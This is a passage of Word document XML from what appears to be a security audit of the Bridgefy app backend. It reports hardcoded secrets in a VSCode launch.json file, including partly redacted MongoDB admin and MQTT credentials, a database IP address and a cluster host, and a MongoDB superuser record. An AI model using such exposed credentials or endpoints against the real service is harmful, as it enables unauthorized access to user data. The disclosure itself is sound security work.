          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_id: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ObjectId("63b70079b32ca9bd21076a73"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'br1[...]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1115" w:right="6424" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'9wn[...]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>superUser: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Hardcoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>bridgefy-app-backend </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>repository contains a number of unredacted secrets within a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>VSCode </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>configuration file. Please note MongoDB Admin Access is just one confirmed example, many other credentials are also affected by this issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-backend/.vscode/launch.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="917" w:right="6912" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"version"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"0.2.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"configurations"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="2862" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBURL"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"mongodb+srv://clustersdk.whqu3.mongodb.net"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBURL"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"mongodb://3.131.221.30"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBUSER"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"adm[...]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBPASS"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Dqn[...]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DBNAME"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"bridgefy-app-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>staging"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="1394" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15749120">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1790700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1189</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1773555" cy="594994"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="60" name="Textbox 60"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="60" name="Textbox 60"/>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1773555" cy="594994"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:tbl>
                            <w:tblPr>
                              <w:tblW w:w="0" w:type="auto"/>
                              <w:jc w:val="left"/>
                              <w:tblCellSpacing w:w="15" w:type="dxa"/>
                              <w:tblInd w:w="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72"/>
                            </w:tblGrid>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="204" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2672" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:bottom w:val="nil"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="184" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="-15"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"MQTTUSERNAME2"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>: </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"br1[...]"</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="197" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2672" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                    <w:bottom w:val="nil"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="-15"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"MQTTPASSWORD2"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>: </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"br1[...]"</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="197" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2672" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                    <w:bottom w:val="nil"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="177" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="-15"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"MQTTUSERNAME"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>: </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"mik[...]"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:color w:val="333333"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>,</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr>
                              <w:trPr>
                                <w:trHeight w:val="204" w:hRule="atLeast"/>
                              </w:trPr>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="2672" w:type="dxa"/>
                                  <w:tcBorders>
                                    <w:top w:val="nil"/>
                                  </w:tcBorders>
                                  <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                                </w:tcPr>
                                <w:p>
                                  <w:pPr>
                                    <w:pStyle w:val="TableParagraph"/>
                                    <w:spacing w:line="184" w:lineRule="exact"/>
                                    <w:ind w:left="0" w:right="-15"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"MQTTPASSWORD"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="333333"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>: </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:b/>
                                      <w:color w:val="DE4F00"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>"mik[...]"</w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Consolas"/>
                                      <w:color w:val="333333"/>
                                      <w:spacing w:val="-2"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t>,</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                          </w:tbl>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
